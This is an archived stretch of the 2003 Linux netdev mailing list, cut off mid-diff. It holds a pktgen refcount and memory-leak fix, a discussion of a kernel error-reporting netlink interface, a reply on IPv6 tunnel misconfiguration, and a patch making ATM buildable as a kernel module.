<20030711.030723.108590257.yoshfuji@wide.ad.jp> Resent-To: netdev@oss.sgi.com Resent-From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= X-Originating-IP: [63.173.114.243] X-Originating-Email: [kambo77@hotmail.com] From: "Kambo Lohan" To: linux-kernel@vger.kernel.org Cc: robert.olsson@its.uu.se Subject: [PATCH] [UPDATED] pktgen fixes .... Date: Thu, 10 Jul 2003 13:40:04 -0400 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 10 Jul 2003 17:40:05.0049 (UTC) FILETIME=[4C380290:01C3470A] Precedence: bulk X-Mailing-List: linux-kernel@vger.kernel.org X-archive-position: 3907 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@wide.ad.jp Precedence: bulk X-list: netdev That last fix was bad... the skb->users refcount change made it possible for the skb to get double freed as skb->users was only incremented from one immediately after calling dev_hard_xmit, this should address that I hope. I now see thats what the old code was trying to avoid, but the old way fails if the first packet attempted failed dev_hard_xmit. So it needs a fix somehow. I am testing this by looping a script that starts pktgen with count=10000 and clone_skb=100. Making sure it does not soft hang (requiring a control c) or cause mem leaks. Here is the updated patch. >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> --- linux-2.4.21/net/core/pktgen.c 2002-11-28 18:53:15.000000000 -0500 +++ linux-2.4-kjp/net/core/pktgen.c 2003-07-10 13:22:17.000000000 -0400 @@ -34,6 +34,7 @@ * * The new changes seem to have a performance impact of around 1%, * as far as I can tell. * --Ben Greear + * Fix refcount off by one if first packet fails, potential null deref, memleak 030710- KJP * * Renamed multiskb to clone_skb and cleaned up sending core for two distinct * skb modes. A clone_skb=0 mode for Ben "ranges" work and a clone_skb != 0 @@ -84,9 +85,9 @@ #define cycles() ((u32)get_cycles()) -#define VERSION "pktgen version 1.2" +#define VERSION "pktgen version 1.2.1" static char version[] __initdata = - "pktgen.c: v1.2: Packet Generator for packet performance testing.\n"; + "pktgen.c: v1.2.1: Packet Generator for packet performance testing.\n"; /* Used to help with determining the pkts on receive */ @@ -613,12 +614,11 @@ kfree_skb(skb); skb = fill_packet(odev, info); if (skb == NULL) { - break; + goto out_reldev; } fp++; fp_tmp = 0; /* reset counter */ } - atomic_inc(&skb->users); } nr_frags = skb_shinfo(skb)->nr_frags; @@ -626,7 +626,9 @@ spin_lock_bh(&odev->xmit_lock); if (!netif_queue_stopped(odev)) { + atomic_inc(&skb->users); if (odev->hard_start_xmit(skb, odev)) { + atomic_dec(&skb->users); if (net_ratelimit()) { printk(KERN_INFO "Hard xmit error\n"); } @@ -634,9 +636,9 @@ last_ok = 0; } else { - last_ok = 1; - info->sofar++; - info->seq_num++; + last_ok = 1; + info->sofar++; + info->seq_num++; } } else { @@ -731,6 +733,8 @@ (unsigned long long) info->errors ); } + + kfree_skb(skb); out_reldev: if (odev) { _________________________________________________________________ MSN 8 with e-mail virus protection service: 2 months FREE* http://join.msn.com/?page=features/virus - To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to majordomo@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html Please read the FAQ at http://www.tux.org/lkml/ From jkenisto@us.ibm.com Thu Jul 10 12:11:35 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 12:12:12 -0700 (PDT) Received: from e4.ny.us.ibm.com (e4.ny.us.ibm.com [32.97.182.104]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AJAl2x016937 for ; Thu, 10 Jul 2003 12:11:34 -0700 Received: from northrelay04.pok.ibm.com (northrelay04.pok.ibm.com [9.56.224.206]) by e4.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6AJAHjR117610; Thu, 10 Jul 2003 15:10:17 -0400 Received: from us.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay04.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6AJADDQ040704; Thu, 10 Jul 2003 15:10:14 -0400 Message-ID: <3F0DB9A5.23723BE1@us.ibm.com> Date: Thu, 10 Jul 2003 12:08:21 -0700 From: Jim Keniston X-Mailer: Mozilla 4.75 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: James Morris CC: LKML , netdev@oss.sgi.com, Andrew Morton , "David S. Miller" , Jeff Garzik , Alan Cox , Randy Dunlap Subject: Re: [PATCH - RFC] [1/2] 2.6 must-fix list - kernel error reporting References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3908 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jkenisto@us.ibm.com Precedence: bulk X-list: netdev James Morris wrote: > > On Tue, 8 Jul 2003, Jim Keniston wrote: > > + kerror_nl = netlink_kernel_create(NETLINK_KERROR, kerror_netlink_rcv); > + if (kerror_nl == NULL) > + panic("kerror_init: cannot initialize kerror_nl\n"); > > You can simply use NULL instead of passing the dummy kerror_netlink_rcv > function. That begs the question: do we trust that nobody but the kernel will send packets to a NETLINK_KERROR socket? Ordinary users can't, but any root application can. Without kerror_netlink_rcv(), such packets don't get dequeued. > > +struct kern_log_entry { > + __u16 log_kmagic; /* always LOGREC_KMAGIC */ > + __u16 log_kversion; /* which version of this struct? */ > + char log_facility[FACILITY_MAXLEN]; /* e.g., driver name */ > > These fields should generally be specified in ascending order to help with > alignment. We include log_kmagic and log_kversion so the receiving app (e.g. the evlog daemon) can figure out which version of the kernel header it's getting. Note that we're up to #3 (going on #4, with the changes you and others have suggested). As long as we have to include log_kmagic and log_kversion, they need to be first. That said, I get the impression that people would be more comfortable if log_facility[] were moved to the end. Other than that, can anybody point out a specific area where there's likely to be an alignment problem? The various members' offsets are the same on i386, ppc32, and ppc64. This should also be true for s390 and s390x. I'd think it'd really matter only when kernel and user on the same system are different architectures. ppc64K/ppc32U, at least, works. > > It may also be worth looking at how the ULOG code batches messages to > improve peformance. Thanks for the pointer. Looks nice. If performance turns out to be an issue (e.g., if for some reason people want to cc all printk messages through this interface), I'll keep that in mind. > > - James > -- > James Morris > Jim K. From mika.penttila@kolumbus.fi Thu Jul 10 12:51:49 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 12:52:26 -0700 (PDT) Received: from notes.hallinto.turkuamk.fi (notes.hallinto.turkuamk.fi [195.148.215.149]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AJp62x020117 for ; Thu, 10 Jul 2003 12:51:48 -0700 Received: from kolumbus.fi ([193.166.244.70]) by marconi.hallinto.turkuamk.fi (Lotus Domino Release 5.0.8) with ESMTP id 2003071022522130:19785 ; Thu, 10 Jul 2003 22:52:21 +0300 Message-ID: <3F0DC518.3010301@kolumbus.fi> Date: Thu, 10 Jul 2003 22:57:12 +0300 From: =?ISO-8859-1?Q?Mika_Penttil=E4?= User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) Gecko/20030208 Netscape/7.02 X-Accept-Language: en-us, en MIME-Version: 1.0 To: =?ISO-8859-1?Q?YOSHIFUJI_Hideaki_/_=3F=3F=3F=3F?= CC: cat@zip.com.au, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, pekkas@netcore.fi Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked References: <20030710154302.GE1722@zip.com.au> <20030711.005542.04973601.yoshfuji@linux-ipv6.org> X-MIMETrack: Itemize by SMTP Server on marconi.hallinto.turkuamk.fi/TAMK(Release 5.0.8 |June 18, 2001) at 10.07.2003 22:52:21, Serialize by Router on notes.hallinto.turkuamk.fi/TAMK(Release 5.0.10 |March 22, 2002) at 10.07.2003 22:52:34, Serialize complete at 10.07.2003 22:52:34 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=us-ascii; format=flowed X-archive-position: 3909 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.penttila@kolumbus.fi Precedence: bulk X-list: netdev But 3ffe:8001:000c:ffff::36 is _not_ subnet routers anycast address. Anyway, looks like a bug to me... --Mika YOSHIFUJI Hideaki / ???? wrote: >In article <20030710154302.GE1722@zip.com.au> (at Fri, 11 Jul 2003 01:43:03 +1000), CaT says: > > > >>With 2.4.21-pre2 I can get a nice tunnel going over my ppp connection >>and as such get ipv6 connectivity. I think went to 2.4.21 and then to >>2.4.22-pre4 and bringing up the tunnel fails as follows: >> >> >: > > >>ip addr add 3ffe:8001:000c:ffff::37/127 dev sit1 >> ip route add ::/0 via 3ffe:8001:000c:ffff::36 >>RTNETLINK answers: Invalid argument >> >> > >This is not bug, but rather misconfiguration; >you cannot use prefix::, which is mandatory subnet routers >anycast address, as unicast address. > >Thank you. > > > From chas@locutus.cmf.nrl.navy.mil Thu Jul 10 13:34:48 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 13:35:25 -0700 (PDT) Received: from ginger.cmf.nrl.navy.mil (ginger.cmf.nrl.navy.mil [134.207.10.161]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AKY72x021414 for ; Thu, 10 Jul 2003 13:34:48 -0700 Received: from locutus.cmf.nrl.navy.mil (locutus.cmf.nrl.navy.mil [134.207.10.66]) by ginger.cmf.nrl.navy.mil (8.12.7/8.12.7) with ESMTP id h6AKXtsG006493; Thu, 10 Jul 2003 16:33:55 -0400 (EDT) Message-Id: <200307102033.h6AKXtsG006493@ginger.cmf.nrl.navy.mil> To: davem@redhat.com cc: netdev@oss.sgi.com Subject: [PATCH][2.4] more atm changes backported to 2.4 Reply-To: chas3@users.sourceforge.net Date: Thu, 10 Jul 2003 16:31:32 -0400 From: chas williams X-Spam-Score: () hits=0.5 X-Virus-Scanned: NAI Completed X-Scanned-By: MIMEDefang 2.30 (www . roaringpenguin . com / mimedefang) X-archive-position: 3910 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: chas@cmf.nrl.navy.mil Precedence: bulk X-list: netdev [atm]: make atm buildable as a module # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. # This patch includes the following deltas: # ChangeSet 1.1013 -> 1.1014 # net/sched/Config.in 1.3 -> 1.4 # arch/cris/config.in 1.13 -> 1.13.1.1 # drivers/net/Config.in 1.62 -> 1.63 # arch/sparc/config.in 1.14 -> 1.14.1.1 # net/atm/Makefile 1.5 -> 1.6 # net/Config.in 1.11 -> 1.12 # arch/alpha/config.in 1.22.1.1 -> 1.22.1.2 # arch/ppc64/config.in 1.6 -> 1.6.1.1 # net/atm/proc.c 1.7 -> 1.8 # net/atm/pvc.c 1.3 -> 1.4 # arch/sparc64/config.in 1.25 -> 1.25.1.1 # arch/i386/config.in 1.42 -> 1.42.1.1 # include/linux/net.h 1.2 -> 1.3 # net/netsyms.c 1.36 -> 1.37 # arch/sh/config.in 1.8 -> 1.8.1.1 # arch/ia64/config.in 1.17 -> 1.17.1.1 # arch/ppc/config.in 1.36 -> 1.36.1.1 # net/atm/svc.c 1.3 -> 1.4 # arch/x86_64/config.in 1.4 -> 1.4.1.1 # net/atm/common.h 1.1 -> 1.2 # drivers/atm/Config.in 1.7 -> 1.8 # arch/parisc/config.in 1.5 -> 1.5.1.1 # net/atm/common.c 1.16 -> 1.17 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/06/27 chas@relax.cmf.nrl.navy.mil 1.1014 # make atm buildable as a module # -------------------------------------------- # diff -Nru a/arch/alpha/config.in b/arch/alpha/config.in --- a/arch/alpha/config.in Mon Jun 30 13:22:50 2003 +++ b/arch/alpha/config.in Mon Jun 30 13:22:50 2003 @@ -367,7 +367,7 @@ bool 'Network device support' CONFIG_NETDEVICES if [ "$CONFIG_NETDEVICES" = "y" ]; then source drivers/net/Config.in - if [ "$CONFIG_ATM" = "y" ]; then + if [ "$CONFIG_ATM" != "n" ]; then source drivers/atm/Config.in fi fi diff -Nru a/arch/cris/config.in b/arch/cris/config.in --- a/arch/cris/config.in Mon Jun 30 13:22:50 2003 +++ b/arch/cris/config.in Mon Jun 30 13:22:50 2003 @@ -199,7 +199,7 @@ bool 'Network device support' CONFIG_NETDEVICES if [ "$CONFIG_NETDEVICES" = "y" ]; then source drivers/net/Config.in - if [ "$CONFIG_ATM" = "y" ]; then + if [ "$CONFIG_ATM" != "n" ]; then source drivers/atm/Config.in fi fi diff -Nru a/arch/i386/config.in b/arch/i386/config.in --- a/arch/i386/config.in Mon Jun 30 13:22:50 2003 +++ b/arch/i386/config.in Mon Jun 30 13:22:50 2003 @@ -393,7 +393,7 @@ bool 'Network device support' CONFIG_NETDEVICES if [ "$CONFIG_NETDEVICES" = "y" ]; then source drivers/net/Config.in - if [ "$CONFIG_ATM" = "y" ]; then + if [ "$CONFIG_ATM" != "n" ]; then source drivers/atm/Config.in fi fi diff -Nru a/arch/ia64/config.in b/arch/ia64/config.in --- a/arch/ia64/config.in Mon Jun 30 13:22:50 2003 +++ b/arch/ia64/config.in Mon Jun 30 13:22:50 2003 @@ -179,7 +179,7 @@ bool 'Network device support' CONFIG_NETDEVICES if [ "$CONFIG_NETDEVICES" = "y" ]; then source drivers/net/Config.in - if [ "$CONFIG_ATM" = "y" ]; then + if [ "$CONFIG_ATM" != "n" ]; then source drivers/atm/Config.in fi fi diff -Nru a/arch/parisc/config.in b/arch/parisc/config.in --- a/arch/parisc/config.in Mon Jun 30 13:22:50 2003 +++ b/arch/parisc/config.in Mon Jun 30 13:22:50 2003 @@ -136,7 +136,7 @@ if [ "$CONFIG_NETDEVICES" = "y" ]; then source drivers/net/Config.in - if [ "$CONFIG_ATM" = "y" ]; then + if [ "$CONFIG_ATM" != "n" ]; then source drivers/atm/Config.in fi fi diff -Nru a/arch/ppc/config.in b/arch/ppc/config.in --- a/arch/ppc/config.in Mon Jun 30 13:22:50 2003 +++ b/arch/ppc/config.in Mon Jun 30 13:22:50 2003 @@ -324,7 +324,7 @@ bool 'Network device support' CONFIG_NETDEVICES if [ "$CONFIG_NETDEVICES" = "y" ]; then source drivers/net/Config.in - if [ "$CONFIG_ATM" = "y" ]; then + if [ "$CONFIG_ATM" != "n" ]; then source drivers/atm/Config.in fi fi diff -Nru a/arch/ppc64/config.in b/arch/ppc64/config.in --- a/arch/ppc64/config.in Mon Jun 30 13:22:50 2003 +++ b/arch/ppc64/config.in Mon Jun 30 13:22:50 2003 @@ -141,7 +141,7 @@ bool 'Network device support' CONFIG_NETDEVICES if [ "$CONFIG_NETDEVICES" = "y" ]; then source drivers/net/Config.in - if [ "$CONFIG_ATM" = "y" ]; then + if [ "$CONFIG_ATM" != "n" ]; then source drivers/atm/Config.in fi fi diff -Nru a/arch/sh/config.in b/arch/sh/config.in --- a/arch/sh/config.in Mon Jun 30 13:22:50 2003 +++ b/arch/sh/config.in Mon Jun 30 13:22:50 2003 @@ -259,7 +259,7 @@ bool 'Network device support' CONFIG_NETDEVICES if [ "$CONFIG_NETDEVICES" = "y" ]; then source drivers/net/Config.in - if [ "$CONFIG_ATM" = "y" ]; then + if [ "$CONFIG_ATM" != "n" ]; then source drivers/atm/Config.in fi fi diff -Nru a/arch/sparc/config.in b/arch/sparc/config.in --- a/arch/sparc/config.in Mon Jun 30 13:22:50 2003 +++ b/arch/sparc/config.in Mon Jun 30 13:22:50 2003 @@ -209,7 +209,7 @@ dep_tristate ' PPP BSD-Compress compression' CONFIG_PPP_BSDCOMP m if [ "$CONFIG_EXPERIMENTAL" = "y" ]; then dep_tristate ' PPP over Ethernet (EXPERIMENTAL)' CONFIG_PPPOE $CONFIG_PPP - if [ "$CONFIG_ATM" = "y" ]; then + if [ "$CONFIG_ATM" != "n" ]; then dep_tristate ' PPP over ATM (EXPERIMENTAL)' CONFIG_PPPOATM $CONFIG_PPP fi fi @@ -235,7 +235,7 @@ # if [ "$CONFIG_FDDI" = "y" ]; then # fi - if [ "$CONFIG_ATM" = "y" ]; then + if [ "$CONFIG_ATM" != "n" ]; then source drivers/atm/Config.in fi fi diff -Nru a/arch/sparc64/config.in b/arch/sparc64/config.in --- a/arch/sparc64/config.in Mon Jun 30 13:22:50 2003 +++ b/arch/sparc64/config.in Mon Jun 30 13:22:50 2003 @@ -234,7 +234,7 @@ bool 'Network device support' CONFIG_NETDEVICES if [ "$CONFIG_NETDEVICES" = "y" ]; then source drivers/net/Config.in - if [ "$CONFIG_ATM" = "y" ]; then + if [ "$CONFIG_ATM" != "n" ]; then source drivers/atm/Config.in fi fi diff -Nru a/arch/x86_64/config.in b/arch/x86_64/config.in --- a/arch/x86_64/config.in Mon Jun 30 13:22:50 2003 +++ b/arch/x86_64/config.in Mon Jun 30 13:22:50 2003 @@ -173,7 +173,7 @@ if [ "$CONFIG_NETDEVICES" = "y" ]; then source drivers/net/Config.in # seems to be largely not 64bit safe -# if [ "$CONFIG_ATM" = "y" ]; then +# if [ "$CONFIG_ATM" != "n" ]; then # source drivers/atm/Config.in # fi fi diff -Nru a/drivers/atm/Config.in b/drivers/atm/Config.in --- a/drivers/atm/Config.in Mon Jun 30 13:22:50 2003 +++ b/drivers/atm/Config.in Mon Jun 30 13:22:50 2003 @@ -4,11 +4,11 @@ mainmenu_option next_comment comment 'ATM drivers' if [ "$CONFIG_INET" = "y" ]; then - tristate 'ATM over TCP' CONFIG_ATM_TCP + dep_tristate 'ATM over TCP' CONFIG_ATM_TCP $CONFIG_ATM fi if [ "$CONFIG_PCI" = "y" ]; then - tristate 'Efficient Networks Speedstream 3010' CONFIG_ATM_LANAI - tristate 'Efficient Networks ENI155P' CONFIG_ATM_ENI + dep_tristate 'Efficient Networks Speedstream 3010' CONFIG_ATM_LANAI $CONFIG_ATM + dep_tristate 'Efficient Networks ENI155P' CONFIG_ATM_ENI $CONFIG_ATM if [ "$CONFIG_ATM_ENI" != "n" ]; then bool ' Enable extended debugging' CONFIG_ATM_ENI_DEBUG bool ' Fine-tune burst settings' CONFIG_ATM_ENI_TUNE_BURST @@ -23,8 +23,8 @@ bool ' Enable 2W RX bursts (optional)' CONFIG_ATM_ENI_BURST_RX_2W fi fi - tristate 'Fujitsu FireStream (FS50/FS155) ' CONFIG_ATM_FIRESTREAM - tristate 'ZeitNet ZN1221/ZN1225' CONFIG_ATM_ZATM + dep_tristate 'Fujitsu FireStream (FS50/FS155) ' CONFIG_ATM_FIRESTREAM $CONFIG_ATM + dep_tristate 'ZeitNet ZN1221/ZN1225' CONFIG_ATM_ZATM $CONFIG_ATM if [ "$CONFIG_ATM_ZATM" != "n" ]; then bool ' Enable extended debugging' CONFIG_ATM_ZATM_DEBUG if [ "$CONFIG_X86" = "y" ]; then @@ -35,32 +35,32 @@ # if [ "$CONFIG_ATM_TNETA1570" = "y" ]; then # bool ' Enable extended debugging' CONFIG_ATM_TNETA1570_DEBUG n # fi - tristate 'IDT 77201 (NICStAR) (ForeRunnerLE)' CONFIG_ATM_NICSTAR + dep_tristate 'IDT 77201 (NICStAR) (ForeRunnerLE)' CONFIG_ATM_NICSTAR $CONFIG_ATM if [ "$CONFIG_ATM_NICSTAR" != "n" ]; then bool ' Use suni PHY driver (155Mbps)' CONFIG_ATM_NICSTAR_USE_SUNI bool ' Use IDT77015 PHY driver (25Mbps)' CONFIG_ATM_NICSTAR_USE_IDT77105 fi - tristate 'IDT 77252 (NICStAR II)' CONFIG_ATM_IDT77252 + dep_tristate 'IDT 77252 (NICStAR II)' CONFIG_ATM_IDT77252 $CONFIG_ATM if [ "$CONFIG_ATM_IDT77252" != "n" ]; then bool ' Enable debugging messages' CONFIG_ATM_IDT77252_DEBUG bool ' Receive ALL cells in raw queue' CONFIG_ATM_IDT77252_RCV_ALL define_bool CONFIG_ATM_IDT77252_USE_SUNI y fi - tristate 'Madge Ambassador (Collage PCI 155 Server)' CONFIG_ATM_AMBASSADOR + dep_tristate 'Madge Ambassador (Collage PCI 155 Server)' CONFIG_ATM_AMBASSADOR $CONFIG_ATM if [ "$CONFIG_ATM_AMBASSADOR" != "n" ]; then bool ' Enable debugging messages' CONFIG_ATM_AMBASSADOR_DEBUG fi - tristate 'Madge Horizon [Ultra] (Collage PCI 25 and Collage PCI 155 Client)' CONFIG_ATM_HORIZON + dep_tristate 'Madge Horizon [Ultra] (Collage PCI 25 and Collage PCI 155 Client)' CONFIG_ATM_HORIZON $CONFIG_ATM if [ "$CONFIG_ATM_HORIZON" != "n" ]; then bool ' Enable debugging messages' CONFIG_ATM_HORIZON_DEBUG fi - tristate 'Interphase ATM PCI x575/x525/x531' CONFIG_ATM_IA - if [ "$CONFIG_ATM_IA" != "n" ]; then - bool ' Enable debugging messages' CONFIG_ATM_IA_DEBUG - fi + dep_tristate 'Interphase ATM PCI x575/x525/x531' CONFIG_ATM_IA $CONFIG_ATM + if [ "$CONFIG_ATM_IA" != "n" ]; then + bool ' Enable debugging messages' CONFIG_ATM_IA_DEBUG + fi fi if [ "$CONFIG_PCI" = "y" -o "$CONFIG_SBUS" = "y" ]; then - tristate 'FORE Systems 200E-series' CONFIG_ATM_FORE200E_MAYBE + dep_tristate 'FORE Systems 200E-series' CONFIG_ATM_FORE200E_MAYBE $CONFIG_ATM if [ "$CONFIG_ATM_FORE200E_MAYBE" != "n" ]; then if [ "$CONFIG_PCI" = "y" ]; then bool ' PCA-200E support' CONFIG_ATM_FORE200E_PCA @@ -93,7 +93,7 @@ fi fi if [ "$CONFIG_PCI" = "y" ]; then - tristate 'ForeRunner HE Series' CONFIG_ATM_HE + dep_tristate 'ForeRunner HE Series' CONFIG_ATM_HE $CONFIG_ATM if [ "$CONFIG_ATM_HE" != "n" ]; then bool 'Use S/UNI PHY driver' CONFIG_ATM_HE_USE_SUNI fi diff -Nru a/drivers/net/Config.in b/drivers/net/Config.in --- a/drivers/net/Config.in Mon Jun 30 13:22:50 2003 +++ b/drivers/net/Config.in Mon Jun 30 13:22:50 2003 @@ -308,7 +308,7 @@ dep_tristate ' PPP over Ethernet (EXPERIMENTAL)' CONFIG_PPPOE $CONFIG_PPP fi if [ ! "$CONFIG_ATM" = "n" ]; then - dep_tristate ' PPP over ATM (EXPERIMENTAL)' CONFIG_PPPOATM $CONFIG_PPP $CONFIG_EXPERIMENTAL + dep_tristate ' PPP over ATM (EXPERIMENTAL)' CONFIG_PPPOATM $CONFIG_PPP $CONFIG_EXPERIMENTAL $CONFIG_ATM fi fi diff -Nru a/include/linux/net.h b/include/linux/net.h --- a/include/linux/net.h Mon Jun 30 13:22:50 2003 +++ b/include/linux/net.h Mon Jun 30 13:22:50 2003 @@ -139,6 +139,7 @@ extern int sock_recvmsg(struct socket *, struct msghdr *m, int len, int flags); extern int sock_readv_writev(int type, struct inode * inode, struct file * file, const struct iovec * iov, long count, long size); +extern struct socket *sockfd_lookup(int fd, int *err); extern int net_ratelimit(void); extern unsigned long net_random(void); diff -Nru a/net/Config.in b/net/Config.in --- a/net/Config.in Mon Jun 30 13:22:50 2003 +++ b/net/Config.in Mon Jun 30 13:22:50 2003 @@ -31,19 +31,19 @@ fi fi if [ "$CONFIG_EXPERIMENTAL" = "y" ]; then - bool 'Asynchronous Transfer Mode (ATM) (EXPERIMENTAL)' CONFIG_ATM - if [ "$CONFIG_ATM" = "y" ]; then + tristate 'Asynchronous Transfer Mode (ATM) (EXPERIMENTAL)' CONFIG_ATM + if [ "$CONFIG_ATM" != "n" ]; then if [ "$CONFIG_INET" = "y" ]; then - tristate ' Classical IP over ATM' CONFIG_ATM_CLIP + dep_tristate ' Classical IP over ATM' CONFIG_ATM_CLIP $CONFIG_ATM if [ "$CONFIG_ATM_CLIP" != "n" ]; then bool ' Do NOT send ICMP if no neighbour' CONFIG_ATM_CLIP_NO_ICMP fi fi - tristate ' LAN Emulation (LANE) support' CONFIG_ATM_LANE + dep_tristate ' LAN Emulation (LANE) support' CONFIG_ATM_LANE $CONFIG_ATM if [ "$CONFIG_INET" = "y" -a "$CONFIG_ATM_LANE" != "n" ]; then tristate ' Multi-Protocol Over ATM (MPOA) support' CONFIG_ATM_MPOA fi - tristate ' RFC1483/2684 Bridged protocols' CONFIG_ATM_BR2684 + dep_tristate ' RFC1483/2684 Bridged protocols' CONFIG_ATM_BR2684 $CONFIG_ATM if [ "$CONFIG_ATM_BR2684" != "n" ]; then bool ' Per-VC IP filter kludge' CONFIG_ATM_BR2684_IPFILTER fi diff -Nru a/net/atm/Makefile b/net/atm/Makefile --- a/net/atm/Makefile Mon Jun 30 13:22:50 2003 +++ b/net/atm/Makefile Mon Jun 30 13:22:50 2003 @@ -14,7 +14,10 @@ list-multi := mpoa.o mpoa-objs := mpc.o mpoa_caches.o mpoa_proc.o -obj-$(CONFIG_ATM) := addr.o pvc.o signaling.o svc.o common.o atm_misc.o raw.o resources.o +obj-y := addr.o pvc.o signaling.o svc.o common.o atm_misc.o raw.o resources.o +ifeq ($(CONFIG_ATM),m) + obj-m += $(O_TARGET) +endif ifneq ($(CONFIG_ATM_CLIP),n) NEED_IPCOM = ipcommon.o @@ -31,13 +34,13 @@ obj-$(CONFIG_ATM_BR2684) += br2684.o ifeq ($(CONFIG_NET_SCH_ATM),y) -NEED_IPCOM = ipcommon.o + NEED_IPCOM = ipcommon.o endif obj-y += $(NEED_IPCOM) ifeq ($(CONFIG_PROC_FS),y) -obj-y += proc.o + obj-y += proc.o endif obj-$(CONFIG_ATM_LANE) += lec.o diff -Nru a/net/atm/common.c b/net/atm/common.c --- a/net/atm/common.c Mon Jun 30 13:22:50 2003 +++ b/net/atm/common.c Mon Jun 30 13:22:50 2003 @@ -21,6 +21,7 @@ #include /* struct timeval */ #include #include +#include #include /* struct sock */ #include @@ -1217,3 +1218,43 @@ return; } #endif + +static int __init atm_init(void) +{ + int error; + + if ((error = atmpvc_init()) < 0) { + printk(KERN_ERR "atmpvc_init() failed with %d\n", error); + goto failure; + } + if ((error = atmsvc_init()) < 0) { + printk(KERN_ERR "atmsvc_init() failed with %d\n", error); + goto failure; + } +#ifdef CONFIG_PROC_FS + if ((error = atm_proc_init()) < 0) { + printk(KERN_ERR "atm_proc_init() failed with %d\n",error); + goto failure; + } +#endif + return 0; + +failure: + atmsvc_exit(); + atmpvc_exit(); + return error; +} + +static void __exit atm_exit(void) +{ +#ifdef CONFIG_PROC_FS + atm_proc_exit(); +#endif + atmsvc_exit(); + atmpvc_exit(); +} + +module_init(atm_init); +module_exit(atm_exit); + +MODULE_LICENSE("GPL"); diff -Nru a/net/atm/common.h b/net/atm/common.h --- a/net/atm/common.h Mon Jun 30 13:22:50 2003 +++ b/net/atm/common.h Mon Jun 30 13:22:50 2003 @@ -28,7 +28,12 @@ void atm_release_vcc_sk(struct sock *sk,int free_sk); void atm_shutdown_dev(struct atm_dev *dev); +int atmpvc_init(void); +void atmpvc_exit(void); +int atmsvc_init(void); +void atmsvc_exit(void); int atm_proc_init(void); +void atm_proc_exit(void); /* SVC */ diff -Nru a/net/atm/proc.c b/net/atm/proc.c --- a/net/atm/proc.c Mon Jun 30 13:22:50 2003 +++ b/net/atm/proc.c Mon Jun 30 13:22:50 2003 @@ -632,12 +632,28 @@ name->proc_fops = &proc_spec_atm_operations; \ name->owner = THIS_MODULE +static struct proc_dir_entry *devices = NULL, *pvc = NULL, + *svc = NULL, *arp = NULL, *lec = NULL, *vc = NULL; -int __init atm_proc_init(void) +static void atm_proc_cleanup(void) { - struct proc_dir_entry *devices = NULL,*pvc = NULL,*svc = NULL; - struct proc_dir_entry *arp = NULL,*lec = NULL,*vc = NULL; + if (devices) + remove_proc_entry("devices",atm_proc_root); + if (pvc) + remove_proc_entry("pvc",atm_proc_root); + if (svc) + remove_proc_entry("svc",atm_proc_root); + if (arp) + remove_proc_entry("arp",atm_proc_root); + if (lec) + remove_proc_entry("lec",atm_proc_root); + if (vc) + remove_proc_entry("vc",atm_proc_root); + remove_proc_entry("net/atm",NULL); +} +int atm_proc_init(void) +{ atm_proc_root = proc_mkdir("net/atm",NULL); if (!atm_proc_root) return -ENOMEM; @@ -654,12 +670,11 @@ return 0; cleanup: - if (devices) remove_proc_entry("devices",atm_proc_root); - if (pvc) remove_proc_entry("pvc",atm_proc_root); - if (svc) remove_proc_entry("svc",atm_proc_root); - if (arp) remove_proc_entry("arp",atm_proc_root); - if (lec) remove_proc_entry("lec",atm_proc_root); - if (vc) remove_proc_entry("vc",atm_proc_root); - remove_proc_entry("net/atm",NULL); + atm_proc_cleanup(); return -ENOMEM; +} + +void atm_proc_exit(void) +{ + atm_proc_cleanup(); } diff -Nru a/net/atm/pvc.c b/net/atm/pvc.c --- a/net/atm/pvc.c Mon Jun 30 13:22:50 2003 +++ b/net/atm/pvc.c Mon Jun 30 13:22:50 2003 @@ -120,20 +120,12 @@ */ -static int __init atmpvc_init(void) +int atmpvc_init(void) { - int error; - - error = sock_register(&pvc_family_ops); - if (error < 0) { - printk(KERN_ERR "ATMPVC: can't register (%d)",error); - return error; - } -#ifdef CONFIG_PROC_FS - error = atm_proc_init(); - if (error) printk("atm_proc_init fails with %d\n",error); -#endif - return 0; + return sock_register(&pvc_family_ops); } -module_init(atmpvc_init); +void atmpvc_exit(void) +{ + sock_unregister(PF_ATMPVC); +} diff -Nru a/net/atm/svc.c b/net/atm/svc.c --- a/net/atm/svc.c Mon Jun 30 13:22:50 2003 +++ b/net/atm/svc.c Mon Jun 30 13:22:50 2003 @@ -443,13 +443,12 @@ * Initialize the ATM SVC protocol family */ -static int __init 